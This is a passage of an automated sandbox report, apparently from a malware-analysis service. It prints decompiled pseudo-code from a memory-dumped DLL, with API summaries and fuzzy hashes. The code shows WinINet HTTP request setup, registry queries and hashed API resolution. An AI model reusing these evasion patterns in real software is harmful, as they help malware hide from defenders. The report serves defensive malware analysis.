									 *(_t249 + 0x10) = 0;
									goto L34;
								} else {
									_t177 =  *(_t249 + 0x10);
									__eflags = _t177;
									if(_t177 == 0) {
										L58:
										_t153 = 1;
									} else {
										__eflags = _t177 - 0xffffffff;
										if(_t177 == 0xffffffff) {
											goto L58;
										} else {
											_t153 = _t244;
										}
									}
									__eflags = _t153;
									if(_t153 != 0) {
										goto L62;
									} else {
										_t154 = L6EA015C0(0xd27f045a, 0xdda3415f);
										__eflags = _t154;
										if(_t154 == 0) {
											goto L62;
										} else {
											_push(_t177);
											asm("int3");
											return _t154;
										}
									}
								}
							} else {
								_t155 =  *((intOrPtr*)(_t249 + 0x1c));
								__eflags = _t155 - 1;
								_t156 =  !=  ? _t244 : _t155;
								E6EA07B30(_t155 - 1,  &(_t254[0x18]), 0x6ea2aa40,  !=  ? _t244 : _t155);
								_t158 = HttpOpenRequestW( *(_t249 + 8), _t254[0x24], _t254[0x26], _t244, _t244, _t244, _t254[0x2e], _t244); // executed
								_t179 = _t158;
								__eflags =  *((char*)(_t249 + 0x14));
								if( *((char*)(_t249 + 0x14)) == 0) {
									L31:
									 *(_t249 + 0x10) = _t179;
									 *((char*)(_t249 + 0x14)) = 1;
									E6EA08CA0( &(_t254[0x18]));
									_t174 =  *(_t249 + 0x10);
									__eflags = _t174;
									if(_t174 == 0) {
										L34:
										_t119 = 1;
									} else {
										__eflags = _t174 - 0xffffffff;
										if(_t174 == 0xffffffff) {
											goto L34;
										} else {
											_t119 = _t244;
										}
									}
									__eflags = _t119;
									if(_t119 != 0) {
										 *_t249 = E6EA07F00();
										E6EA08CA0( &(_t254[0x20]));
										E6EA08CA0( &(_t254[0x1c]));
										E6EA10B10( &(_t254[0xe]));
										E6EA10B10( &(_t254[0xa]));
										E6EA10B10( &(_t254[6]));
										E6EA10B10( &(_t254[2]));
										__eflags = 0;
										return 0;
									} else {
										_t128 =  *0x6ea2b244; // 0xb7b294eb
										__eflags = _t128 - 0xb7b294eb;
										if(_t128 != 0xb7b294eb) {
											E6EA22760( &(_t254[0x18]),  *_t128, 0xffffffff);
											_t151 =  *0x6ea2b27c; // 0x0
											while(1) {
												__eflags =  *(_t151 + _t244 * 8);
												if( *(_t151 + _t244 * 8) == 0) {
													break;
												}
												_t244 =  &(_t244[0]);
												__eflags = _t244 - 0x1000;
												if(_t244 < 0x1000) {
													continue;
												}
												L40:
												E6EA22810(_t151,  &(_t254[0x14]));
												goto L41;
											}
											 *(_t151 + _t244 * 8) = _t174;
											_t151 = E6EA010E0(0);
											_t230 =  *0x6ea2b27c; // 0x0
											 *((intOrPtr*)(_t230 + 4 + _t244 * 8)) = _t151;
											goto L40;
										}
										L41:
										_t129 =  *(_t249 + 0x40);
										__eflags = _t129;
										if(_t129 != 0) {
											_t254[0x12] = _t129 * 0x3e8;
											_t228 = L6EA015C0(0xd27f045a, 0x863455c4);
											__eflags = _t228;
											if(_t228 != 0) {
												 *_t228( *(_t249 + 0x10), 5,  &(_t254[0x12]), 4);
											}
											_t229 = L6EA015C0(0xd27f045a, 0x863455c4);
											__eflags = _t229;
											if(_t229 != 0) {
												 *_t229( *(_t249 + 0x10), 6,  &(_t254[0x12]), 4);
											}
										}
										_t254[0x2e] = 4;
										_t209 = L6EA015C0(0xd27f045a, 0x9217c72);
										__eflags = _t209;
										if(_t209 != 0) {
											 *_t209( *(_t249 + 0x10), 0x1f,  &(_t254[0x2c]),  &(_t254[0x2e]));
										}
										_t254[0x2c] = _t254[0x2c] | 0x00003380;
										_t226 = L6EA015C0(0xd27f045a, 0x863455c4);
										__eflags = _t226;
										if(_t226 != 0) {
											 *_t226( *(_t249 + 0x10), 0x1f,  &(_t254[0x2c]), _t254[0x2e]);
										}
										E6EA08CA0( &(_t254[0x20]));
										E6EA08CA0( &(_t254[0x1c]));
										E6EA10B10( &(_t254[0xe]));
										E6EA10B10( &(_t254[0xa]));
										E6EA10B10( &(_t254[6]));
										E6EA10B10( &(_t254[2]));
										return 1;
									}
								} else {
									_t240 =  *(_t249 + 0x10);
									__eflags = _t240;
									if(_t240 == 0) {
										L27:
										_t160 = 1;
									} else {
										__eflags = _t240 - 0xffffffff;
										if(_t240 == 0xffffffff) {
											goto L27;
										} else {
											_t160 = _t244;
										}
									}
									__eflags = _t160;
									if(_t160 != 0) {
										goto L31;
									} else {
										_t161 = L6EA015C0(0xd27f045a, 0xdda3415f);
										__eflags = _t161;
										if(_t161 == 0) {
											goto L31;
										} else {
											_push(_t240);
											asm("int3");
											return _t161;
										}
									}
								}
							}
						}
					} else {
						_t241 =  *(_t249 + 8);
						if(_t241 == 0 || _t241 == 0xffffffff) {
							_t166 = 1;
						} else {
							_t166 = _t244;
						}
						if(_t166 != 0) {
							goto L14;
						} else {
							_t167 = L6EA015C0(0xd27f045a, 0xdda3415f);
							if(_t167 == 0) {
								goto L14;
							} else {
								_push(_t241);
								asm("int3");
								return _t167;
							}
						}
					}
				}
			}

0x6ea23374
0x6ea23377
0x6ea2337d
0x6ea2337f
0x6ea23389
0x6ea23394
0x6ea2339f
0x6ea233aa
0x6ea233b4
0x6ea233b9
0x6ea233c2
0x6ea233cf
0x6ea233dc
0x6ea233eb
0x6ea233fa
0x6ea23407
0x6ea23410
0x6ea23419
0x6ea23429
0x6ea2342b
0x6ea2343f
0x6ea23449
0x6ea23454
0x6ea23459
0x6ea2345b
0x6ea2345b
0x6ea2344b
0x6ea2344b
0x6ea2344b
0x6ea23449
0x6ea23475
0x6ea237cf
0x6ea237d3
0x6ea23804
0x6ea23804
0x6ea23808
0x00000000
0x6ea237d5
0x6ea237d5
0x6ea237d8
0x6ea237da
0x6ea237e5
0x6ea237e5
0x6ea237dc
0x6ea237dc
0x6ea237df
0x00000000
0x6ea237e1
0x6ea237e1
0x6ea237e1
0x6ea237df
0x6ea237ea
0x6ea237ec
0x00000000
0x6ea237ee
0x6ea237f8
0x6ea237fd
0x6ea237ff
0x00000000
0x6ea23801
0x6ea23801
0x6ea23802
0x6ea23803
0x6ea23803
0x6ea237ff
0x6ea237ec
0x6ea2347b
0x6ea23486
0x6ea2348c
0x6ea2348e
0x6ea23494
0x6ea234c5
0x6ea234c5
0x6ea234c9
0x6ea234cc
0x6ea234ce
0x6ea234d9
0x6ea234d9
0x6ea234d0
0x6ea234d0
0x6ea234d3
0x00000000
0x6ea234d5
0x6ea234d5
0x6ea234d5
0x6ea234d3
0x6ea234de
0x6ea234e0
0x6ea236e0
0x6ea236e7
0x6ea236f0
0x6ea236f9
0x6ea23702
0x6ea2370b
0x6ea23714
0x6ea23719
0x6ea23722
0x6ea234e6
0x6ea234e6
0x6ea234ea
0x6ea234f6
0x6ea234ec
0x6ea234ec
0x6ea234ec
0x6ea23508
0x6ea2350f
0x6ea23511
0x6ea23788
0x6ea2378c
0x6ea237bd
0x6ea237bd
0x6ea237c1
0x6ea237c3
0x00000000
0x6ea2378e
0x6ea2378e
0x6ea23791
0x6ea23793
0x6ea2379e
0x6ea2379e
0x6ea23795
0x6ea23795
0x6ea23798
0x00000000
0x6ea2379a
0x6ea2379a
0x6ea2379a
0x6ea23798
0x6ea237a3
0x6ea237a5
0x00000000
0x6ea237a7
0x6ea237b1
0x6ea237b6
0x6ea237b8
0x00000000
0x6ea237ba
0x6ea237ba
0x6ea237bb
0x6ea237bc
0x6ea237bc
0x6ea237b8
0x6ea237a5
0x6ea23517
0x6ea23517
0x6ea2351a
0x6ea23524
0x6ea2352e
0x6ea23544
0x6ea23546
0x6ea23548
0x6ea2354c
0x6ea2357d
0x6ea2357d
0x6ea23584
0x6ea23588
0x6ea2358d
0x6ea23590
0x6ea23592
0x6ea2359d
0x6ea2359d
0x6ea23594
0x6ea23594
0x6ea23597
0x00000000
0x6ea23599
0x6ea23599
0x6ea23599
0x6ea23597
0x6ea235a2
0x6ea235a4
0x6ea23743
0x6ea2374a
0x6ea23753
0x6ea2375c
0x6ea23765
0x6ea2376e
0x6ea23777
0x6ea2377c
0x6ea23785
0x6ea235aa
0x6ea235aa
0x6ea235af
0x6ea235b4
0x6ea235be
0x6ea235c3
0x6ea235c8
0x6ea235c8
0x6ea235cc
0x00000000
0x00000000
0x6ea235d2
0x6ea235d3
0x6ea235d9
0x00000000
0x00000000
0x6ea235db
0x6ea235df
0x00000000
0x6ea235df
0x6ea23727
0x6ea2372a
0x6ea2372f
0x6ea23735
0x00000000
0x6ea23735
0x6ea235e4
0x6ea235e4
0x6ea235e7
0x6ea235e9
0x6ea235f1
0x6ea23604
0x6ea23606
0x6ea23608
0x6ea23616
0x6ea23616
0x6ea23627
0x6ea23629
0x6ea2362b
0x6ea23639
0x6ea23639
0x6ea2362b
0x6ea2363b
0x6ea23652
0x6ea23654
0x6ea23656
0x6ea23667
0x6ea23667
0x6ea23669
0x6ea23680
0x6ea23682
0x6ea23684
0x6ea23694
0x6ea23694
0x6ea2369a
0x6ea236a3
0x6ea236ac
0x6ea236b5
0x6ea236be
0x6ea236c7
0x6ea236d8
0x6ea236d8
0x6ea2354e
0x6ea2354e
0x6ea23551
0x6ea23553
0x6ea2355e
0x6ea2355e
0x6ea23555
0x6ea23555
0x6ea23558
0x00000000
0x6ea2355a
0x6ea2355a
0x6ea2355a
0x6ea23558
0x6ea23563
0x6ea23565
0x00000000
0x6ea23567
0x6ea23571
0x6ea23576
0x6ea23578
0x00000000
0x6ea2357a
0x6ea2357a
0x6ea2357b
0x6ea2357c
0x6ea2357c
0x6ea23578
0x6ea23565
0x6ea2354c
0x6ea23511
0x6ea23496
0x6ea23496
0x6ea2349b
0x6ea234a6
0x6ea234a2
0x6ea234a2
0x6ea234a2
0x6ea234ad
0x00000000
0x6ea234af
0x6ea234b9
0x6ea234c0
0x00000000
0x6ea234c2
0x6ea234c2
0x6ea234c3
0x6ea234c4
0x6ea234c4
0x6ea234c0
0x6ea234ad
0x6ea23494

APIs

InternetConnectW.WININET(E3A10E7E,?,00000000,00000000,00000000,00000003,00000000,00000000,D27F045A,0E214CDE,?,00000000,?,00000000,00000000,00000000), ref: 6EA2348C
HttpOpenRequestW.WININET(A1310F65,?,?,00000000,00000000,00000000,?,00000000,?,6EA2AA40,A1310F65,D27F045A,8813E141), ref: 6EA23544

Part of subcall function 6EA010E0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6EA01124

Memory Dump Source

Source File: 00000000.00000002.690396403.000000006E9F1000.00000020.00020000.sdmp, Offset: 6E9F0000, based on PE: true

Associated: 00000000.00000002.690389011.000000006E9F0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.690462400.000000006EA25000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.690472523.000000006EA2B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.690481387.000000006EA2C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ConnectHttpInternetOpenRequestUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 3503947753-0
Opcode ID: f7024cf48b80256016f8c35dc6db571686b7de98ef969ad659072c92f93c1ed8
Instruction ID: aa02c2ab25201e49d8be55e9d7c941ec75367517b69ec7f339bfc84c3183efaf
Opcode Fuzzy Hash: f7024cf48b80256016f8c35dc6db571686b7de98ef969ad659072c92f93c1ed8
Instruction Fuzzy Hash: 93C1D4302183069FDB01DFA5CD94BEF77A8AF92358F184828F4A5662D0EB70D9C9C759

Uniqueness

Uniqueness Score: -1.00%

Function 6EA1CAE0, Relevance: 3.2, APIs: 2, Instructions: 207
registryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E6EA1CAE0(void* __ecx) {
				void* __esi;
				intOrPtr _t49;
				int* _t50;
				void* _t52;
				void* _t62;
				int _t99;
				intOrPtr* _t100;
				void* _t101;
				signed short* _t102;
				void* _t129;
				char* _t139;
				void* _t143;
				intOrPtr* _t144;
				intOrPtr* _t146;

				_t143 = __ecx;
				_push(0);
				E6EA19350(_t146 + 0x14);
				_t49 =  *((intOrPtr*)(__ecx + 4));
				if(_t49 == 0 || _t49 == 0xffffffff) {
					_t50 = 1;
				} else {
					_t50 = 0;
				}
				if(_t50 != 0) {
					L11:
					_t99 = 0;
				} else {
					_t139 =  *((intOrPtr*)(_t146 + 0x44));
					if(_t139 == 0 ||  *_t139 != 0) {
						_t129 = _t146 + 8;
						 *((intOrPtr*)(_t129 + 0x18)) = 0;
						 *((intOrPtr*)(_t129 + 0x1c)) = 0;
						E6EA087A0(_t129);
						if(L6EA015C0(0x3ab94787, 0x7c5744d4) != 0) {
							RegQueryValueExW( *(_t143 + 4),  *(_t146 + 0x18), 0, _t146 + 0x20, 0, _t146 + 0x24); // executed
						}
						_t89 =  *(_t146 + 0x24);
						if( *(_t146 + 0x24) != 0) {
							E6EA19670(_t146 + 0x14, _t89);
							if(L6EA015C0(0x3ab94787, 0x7c5744d4) != 0) {
								_t142 =  *(_t143 + 4);
								RegQueryValueExW( *(_t143 + 4),  *(_t146 + 8), 0, _t146 + 0x20, E6EA19640(_t146 + 0x14, 0), _t146 + 0x24); // executed
							}
							_t99 =  *(_t146 + 0x20);
							E6EA08CA0(_t146 + 8);
						} else {
							E6EA08CA0(_t146 + 8);
							goto L11;
						}
					} else {
						goto L11;
					}
				}
				if(_t99 == 2) {
					_t100 = L6EA015C0(0xa1310f65, 0x6ad451b6);
					if(_t100 != 0) {
						_t52 = E6EA19640(_t146 + 0x14, 0);
						 *_t100(_t52, 0, 0);
						_t101 = 0;
					} else {
						_t101 = 0;
					}
					E6EA08810(_t146, _t101);
					_t144 = L6EA015C0(0xa1310f65, 0x6ad451b6);
					if(_t144 != 0) {
						_t62 = E6EA19640(_t146 + 0x14, 0);
						 *_t144(_t62,  *((intOrPtr*)(_t146 + 4)), _t101);
					}
					E6EA088C0( *((intOrPtr*)(_t146 + 0x44)), _t146);
					E6EA08CA0(_t146);
					L6EA19510(_t146 + 0x10);
					return  *((intOrPtr*)(_t146 + 0x40));
				} else {
					if(_t99 != 7) {
						if(_t99 != 1) {
							E6EA08810( *((intOrPtr*)(_t146 + 0x44)), 0);
							L6EA19510(_t146 + 0x10);
							return  *((intOrPtr*)(_t146 + 0x40));
						} else {
							E6EA08AB0( *((intOrPtr*)(_t146 + 0x48)), E6EA19640(_t146 + 0x14, 0), 0);
							L6EA19510(_t146 + 0x10);
							return  *((intOrPtr*)(_t146 + 0x40));
						}
					} else {
						E6EA08810(_t146 + 4, 0);
						_t102 = E6EA19640(_t146 + 0x14, 0);
						while(( *_t102 & 0x0000ffff) != 0) {
							if(E6EA10180( *_t146, 0x7fffffff, _t142) != 0) {
								E6EA096D0(_t146 + 4, 0xa);
							}
							E6EA08AB0(_t146 + 0x30, _t102, 0);
							E6EA10220(_t146 + 8,  *((intOrPtr*)(_t146 + 0x2c)), 0);
							_t102 = _t102 + 2 + E6EA10180( *((intOrPtr*)(_t146 + 0x28)), 0x7fffffff, _t142) * 2;
							E6EA08CA0(_t146 + 0x28);
						}
						E6EA088C0( *((intOrPtr*)(_t146 + 0x44)), _t146);
						E6EA08CA0(_t146);
						L6EA19510(_t146 + 0x10);
						return  *((intOrPtr*)(_t146 + 0x40));
					}
				}
			}

0x6ea1cae6
0x6ea1cae8
0x6ea1caee
0x6ea1caf3
0x6ea1caf8
0x6ea1cb03
0x6ea1caff
0x6ea1caff
0x6ea1caff
0x6ea1cb0a
0x6ea1cb6b
0x6ea1cb6b
0x6ea1cb0c
0x6ea1cb0c
0x6ea1cb12
0x6ea1cb1b
0x6ea1cb1f
0x6ea1cb22
0x6ea1cb25
0x6ea1cb3d
0x6ea1cb54
0x6ea1cb54
0x6ea1cb56
0x6ea1cb5c
0x6ea1cd05
0x6ea1cd1d
0x6ea1cd1f
0x6ea1cd42
0x6ea1cd42
0x6ea1cd44
0x6ea1cd4c
0x6ea1cb62
0x6ea1cb66
0x00000000
0x6ea1cb66
0x00000000
0x00000000
0x00000000
0x6ea1cb12
0x6ea1cb70
0x6ea1cc84
0x6ea1cc88
0x6ea1cc94
0x6ea1cca0
0x6ea1cca2
0x6ea1cc8a
0x6ea1cc8a
0x6ea1cc8a
0x6ea1cca8
0x6ea1ccbc
0x6ea1ccc0
0x6ea1ccc8
0x6ea1ccd3
0x6ea1ccd3
0x6ea1ccdd
0x6ea1cce5
0x6ea1ccee
0x6ea1ccfd
0x6ea1cb76
0x6ea1cb79
0x6ea1cc25
0x6ea1cc5a
0x6ea1cc63
0x6ea1cc72
0x6ea1cc27
0x6ea1cc39
0x6ea1cc42
0x6ea1cc51
0x6ea1cc51
0x6ea1cb7f
0x6ea1cb85
0x6ea1cb95
0x6ea1cb9c
0x6ea1cbad
0x6ea1cbb5
0x6ea1cbb5
0x6ea1cbc1
0x6ea1cbd0
0x6ea1cbe7
0x6ea1cbeb
0x6ea1cbf3
0x6ea1cbff
0x6ea1cc07
0x6ea1cc10
0x6ea1cc1f
0x6ea1cc1f
0x6ea1cb79

APIs

RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,3AB94787,7C5744D4,00000000), ref: 6EA1CB54

Memory Dump Source

Source File: 00000000.00000002.690396403.000000006E9F1000.00000020.00020000.sdmp, Offset: 6E9F0000, based on PE: true

Associated: 00000000.00000002.690389011.000000006E9F0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.690462400.000000006EA25000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.690472523.000000006EA2B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.690481387.000000006EA2C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 1a993fb9358f32fd43622a429a7ad0c6ffa3ee027b8f9921b25b7e9b31177733
Instruction ID: c952a9c6353be504e98c8d62163e7265236de60d9b34ceaf6238e8a092e71f24
Opcode Fuzzy Hash: 1a993fb9358f32fd43622a429a7ad0c6ffa3ee027b8f9921b25b7e9b31177733
Instruction Fuzzy Hash: E061613021C201AAD344DFA4DE91BEBB3ACAF9474CF140D2DB5559A190EF21ED88C76A

Uniqueness

Uniqueness Score: -1.00%

Function 6EA1C790, Relevance: 3.1, APIs: 2, Instructions: 85
registryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E6EA1C790(void* __ecx, void* __edx) {
				intOrPtr _t21;
				int* _t22;
				char* _t47;
				void* _t50;
				void* _t53;

				 *((intOrPtr*)(_t53 + 0x18)) = 0;
				_t50 = __ecx;
				_push(0);
				E6EA19350(_t53 + 4);
				_t21 =  *((intOrPtr*)(__ecx + 4));
				if(_t21 == 0 || _t21 == 0xffffffff) {
					_t22 = 1;
				} else {
					_t22 = 0;
				}
				if(_t22 != 0) {
					L10:
					L6EA19510(_t53);
					return  *((intOrPtr*)(_t53 + 0x18));
				} else {
					_t47 =  *(_t53 + 0x2c);
					if(_t47 == 0 ||  *_t47 != 0) {
						 *(_t53 + 0x10) = 0;
						 *(_t53 + 0x14) = 0;
						if(L6EA015C0(0x3ab94787, 0x8883f185) != 0) {
							RegQueryValueExA( *(_t50 + 4), _t47, 0, _t53 + 0x10, 0, _t53 + 0x14); // executed
						}
						_t26 =  *(_t53 + 0x14);
						if( *(_t53 + 0x14) != 0) {
							E6EA19670(_t53 + 4, _t26);
							if(L6EA015C0(0x3ab94787, 0x8883f185) != 0) {
								RegQueryValueExA( *(_t50 + 4), _t47, 0, _t53 + 0x10, E6EA19640(_t53 + 4, 0), _t53 + 0x14); // executed
							}
							if( *(_t53 + 0x10) == 4) {
								E6EA197D0(_t53 + 8, _t53 + 0x18, 4);
							}
						}
					}
					goto L10;
				}
			}

0x6ea1c798
0x6ea1c79c
0x6ea1c79e
0x6ea1c7a3
0x6ea1c7a8
0x6ea1c7ad
0x6ea1c7b8
0x6ea1c7b4
0x6ea1c7b4
0x6ea1c7b4
0x6ea1c7bf
0x6ea1c805
0x6ea1c80c
0x6ea1c819
0x6ea1c7c1
0x6ea1c7c1
0x6ea1c7c7
0x6ea1c7ce
0x6ea1c7d2
0x6ea1c7e9
0x6ea1c7fb
0x6ea1c7fb
0x6ea1c7fd
0x6ea1c803
0x6ea1c821
0x6ea1c839
0x6ea1c85a
0x6ea1c85a
0x6ea1c861
0x6ea1c86e
0x6ea1c86e
0x6ea1c861
0x6ea1c803
0x00000000
0x6ea1c7c7

APIs

RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,?,8883F185,00000000), ref: 6EA1C7FB
RegQueryValueExA.KERNELBASE(?,?,00000000,8883F185,00000000,00000000,00000000,8883F185,?,8883F185,00000000), ref: 6EA1C85A

Memory Dump Source

Source File: 00000000.00000002.690396403.000000006E9F1000.00000020.00020000.sdmp, Offset: 6E9F0000, based on PE: true

Associated: 00000000.00000002.690389011.000000006E9F0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.690462400.000000006EA25000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.690472523.000000006EA2B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.690481387.000000006EA2C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 1b4fde19d6e27f85aaca9c95f26fbe1a7904d47f24c8b1bb7409f34fb5227349
Instruction ID: e5f366e17d3a5c5de7ae012605be6674dc17c29aab41f17fa3810337ade4ffa2
Opcode Fuzzy Hash: 1b4fde19d6e27f85aaca9c95f26fbe1a7904d47f24c8b1bb7409f34fb5227349
Instruction Fuzzy Hash: 0C218D3120C317AAD315DEA4CE50AEB77AC9F90B54F04093DB4559A180EB70ED89C7EA

Uniqueness

Uniqueness Score: -1.00%

Function 6EA1C2D0, Relevance: 1.7, APIs: 1, Instructions: 196
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E6EA1C2D0(void* __ebx, long* __ecx, void* __edi, void* __esi, void* __ebp, intOrPtr _a4, void* _a8, void* _a12) {
				char _v28;
				char _v32;
				unsigned int _v36;
				char _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				long* _v56;
				long _v60;
				long* _v64;
				int _v68;
				intOrPtr _v72;
				signed int _v76;
				long _v80;
				unsigned int _t57;
				signed int* _t59;
				void* _t62;
				void* _t66;
				void* _t74;
				long _t75;
				void* _t76;
				void** _t77;
				long _t78;
				long* _t82;
				void* _t83;
				long _t84;
				long _t102;
				short* _t107;
				long _t117;
				signed int _t122;
				signed int _t123;
				signed int _t124;
				intOrPtr _t125;
				long _t127;
				void* _t130;
				long _t132;
				intOrPtr _t135;
				long _t136;
				long _t140;
				void* _t142;
				long* _t143;

				_push(__esi);
				_push(__edi);
				_t143 = _t142 - 0x40;
				_t82 = __ecx;
				E6EA03930(__ecx, 0, __edi, __esi);
				_t130 =  !=  ? 0 : 0x100;
				_t121 =  <=  ? 0x3000f : 0x20009;
				_t122 = ( <=  ? 0x3000f : 0x20009) | 0x00000100;
				E6EA08810( &_v40, 0x104);
				_t107 =  *((intOrPtr*)(__ecx + 0xc));
				if(_t107 != 0) {
					 *_t107 = 0;
				}
				_t140 = _a8;
				_t57 = E6EA19650(_a4) >> 2;
				if(_t57 > 0) {
					_v56 =  &(_t82[3]);
					_v44 = 0;
					_t16 = _t57 - 1; // -1
					_v76 = _t122;
					_v68 = _t16;
					_v72 = _t130 + 0x20009;
					_t132 = 0;
					_v52 = _t57;
					_v64 = _t82;
					_t123 = 0;
					while(1) {
						L15:
						_t59 = E6EA19640(_a4, _t123 * 4);
						_t83 = 0;
						_v48 = _t123;
						_t124 =  *_t59 ^ 0x38ba5c7b;
						_v52 = _t132;
						while(1) {
							_t62 = L6EA015C0(0x3ab94787, 0xf561ae8b);
							if(_t62 != 0) {
								break;
							}
							E6EA0A0D0( &_v40,  &_v32);
							E6EA083B0( &_v28);
							_t66 = E6EA1D620(_v28, E6EA16040(_v28, 0x7fffffff));
							E6EA10B10( &_v28);
							if(_t66 != _t124) {
								E6EA08CA0( &_v32);
								_t83 = _t83 + 1;
								continue;
							} else {
								_t125 = _v44;
								_t135 =  *((intOrPtr*)( &_v32 - 0x10));
								E6EA08CA0( &_v32);
								if(_t125 != 0) {
									E6EA096D0(_v56, 0x5c);
								}
								E6EA10220(_v56, _v40, 0);
								_v68 = 0;
								if(L6EA015C0(0x3ab94787, 0xd5493f9) == 0) {
									_t117 = 0;
								} else {
									_t77 =  &_v60;
									_t104 =  ==  ?  *((void*)(_t77 - 0x10)) :  *((intOrPtr*)(_t77 - 0xc));
									_t78 = RegOpenKeyExW(_a8,  *(_t77[1]), 0,  ==  ?  *((void*)(_t77 - 0x10)) :  *((intOrPtr*)(_t77 - 0xc)), _t77); // executed
									_t117 = _t78;
								}
								_t84 = _v60;
								if(_t84 == 0 || _t84 == 0xffffffff) {
									L37:
									_t82 = _v64;
									_t136 = _t117;
									goto L4;
								} else {
									if(_t135 == 0) {
										L34:
										_t123 = _t125 + 1;
										_t140 = _t84;
										if(_t123 < _v52) {
											_t132 = 1;
											goto L15;
										} else {
											goto L37;
										}
									} else {
										if(_t140 == 0 || _t140 == 0xffffffff) {
											_t75 = 1;
										} else {
											_t75 = 0;
										}
										if(_t75 != 0) {
											goto L34;
										} else {
											_v80 = _t117;
											_t76 = L6EA015C0(0x3ab94787, 0x91935d4e);
											_t117 =  *_t143;
											if(_t76 == 0) {
												goto L34;
											} else {
												_push(_t140);
												_v80 = _t117;
												asm("int3");
												return _t76;
											}
										}
									}
								}
							}
							goto L38;
						}
						_push(_v36 >> 1);
						_push(_v40);
						_push(_t83);
						_push(_t140);
						asm("int3");
						return _t62;
						goto L38;
					}
				} else {
					_t136 = 0;
					L4:
					if(_t82[2] == 0) {
						L12:
						_t82[1] = _t140;
						_t82[2] = 1;
						E6EA08CA0( &_v40);
						 *_t82 = _t136;
						return _t136;
					} else {
						_t127 = _t82[1];
						if(_t127 == 0 || _t127 == 0xffffffff) {
							_t102 = 1;
						} else {
							_t102 = 0;
						}
						if(_t102 != 0) {
							goto L12;
						} else {
							_t74 = L6EA015C0(0x3ab94787, 0x91935d4e);
							if(_t74 == 0) {
								goto L12;
							} else {
								_push(_t127);
								asm("int3");
								return _t74;
							}
						}
					}
				}
				L38:
			}

0x6ea1c2d0
0x6ea1c2d1
0x6ea1c2d4
0x6ea1c2d7
0x6ea1c2db
0x6ea1c2f4
0x6ea1c30b
0x6ea1c30e
0x6ea1c310
0x6ea1c315
0x6ea1c31a
0x6ea1c31e
0x6ea1c31e
0x6ea1c325
0x6ea1c32e
0x6ea1c333
0x6ea1c393
0x6ea1c399
0x6ea1c39d
0x6ea1c3a0
0x6ea1c3a4
0x6ea1c3a8
0x6ea1c3ac
0x6ea1c3ae
0x6ea1c3b2
0x6ea1c3b6
0x6ea1c3bf
0x6ea1c3bf
0x6ea1c3cb
0x6ea1c3d2
0x6ea1c3d9
0x6ea1c3dd
0x6ea1c3df
0x6ea1c3e3
0x6ea1c3ed
0x6ea1c3f4
0x00000000
0x00000000
0x6ea1c418
0x6ea1c425
0x6ea1c43e
0x6ea1c449
0x6ea1c450
0x6ea1c523
0x6ea1c528
0x00000000
0x6ea1c456
0x6ea1c456
0x6ea1c45e
0x6ea1c461
0x6ea1c468
0x6ea1c470
0x6ea1c470
0x6ea1c47f
0x6ea1c484
0x6ea1c49f
0x6ea1c4c3
0x6ea1c4a1
0x6ea1c4a5
0x6ea1c4ac
0x6ea1c4bd
0x6ea1c4bf
0x6ea1c4bf
0x6ea1c4c5
0x6ea1c4cb
0x6ea1c537
0x6ea1c537
0x6ea1c53b
0x00000000
0x6ea1c4d2
0x6ea1c4d4
0x6ea1c510
0x6ea1c510
0x6ea1c511
0x6ea1c517
0x6ea1c3ba
0x00000000
0x6ea1c51d
0x00000000
0x6ea1c51d
0x6ea1c4d6
0x6ea1c4d8
0x6ea1c4e3
0x6ea1c4df
0x6ea1c4df
0x6ea1c4df
0x6ea1c4ea
0x00000000
0x6ea1c4ec
0x6ea1c4f6
0x6ea1c4fa
0x6ea1c4ff
0x6ea1c504
0x00000000
0x6ea1c506
0x6ea1c506
0x6ea1c507
0x6ea1c50b
0x6ea1c50c
0x6ea1c50c
0x6ea1c504
0x6ea1c4ea
0x6ea1c4d4
0x6ea1c4cb
0x00000000
0x6ea1c450
0x6ea1c3fc
0x6ea1c3fd
0x6ea1c401
0x6ea1c402
0x6ea1c403
0x6ea1c404
0x00000000
0x6ea1c404
0x6ea1c335
0x6ea1c335
0x6ea1c337
0x6ea1c33b
0x6ea1c36c
0x6ea1c36c
0x6ea1c373
0x6ea1c377
0x6ea1c37c
0x6ea1c387
0x6ea1c33d
0x6ea1c33d
0x6ea1c342
0x6ea1c34d
0x6ea1c349
0x6ea1c349
0x6ea1c349
0x6ea1c354
0x00000000
0x6ea1c356
0x6ea1c360
0x6ea1c367
0x00000000
0x6ea1c369
0x6ea1c369
0x6ea1c36a
0x6ea1c36b
0x6ea1c36b
0x6ea1c367
0x6ea1c354
0x6ea1c33b
0x00000000

Memory Dump Source

Source File: 00000000.00000002.690396403.000000006E9F1000.00000020.00020000.sdmp, Offset: 6E9F0000, based on PE: true

Associated: 00000000.00000002.690389011.000000006E9F0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.690462400.000000006EA25000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.690472523.000000006EA2B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.690481387.000000006EA2C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f17b59286eec2a0a04a93962903cfa7af11a798c4da61e5b2bbe808ff438f0cb
Instruction ID: f6b532def4f662344b788aeb7f652141d0afc6a95ff4ac6ac844c7907314e835
Opcode Fuzzy Hash: f17b59286eec2a0a04a93962903cfa7af11a798c4da61e5b2bbe808ff438f0cb
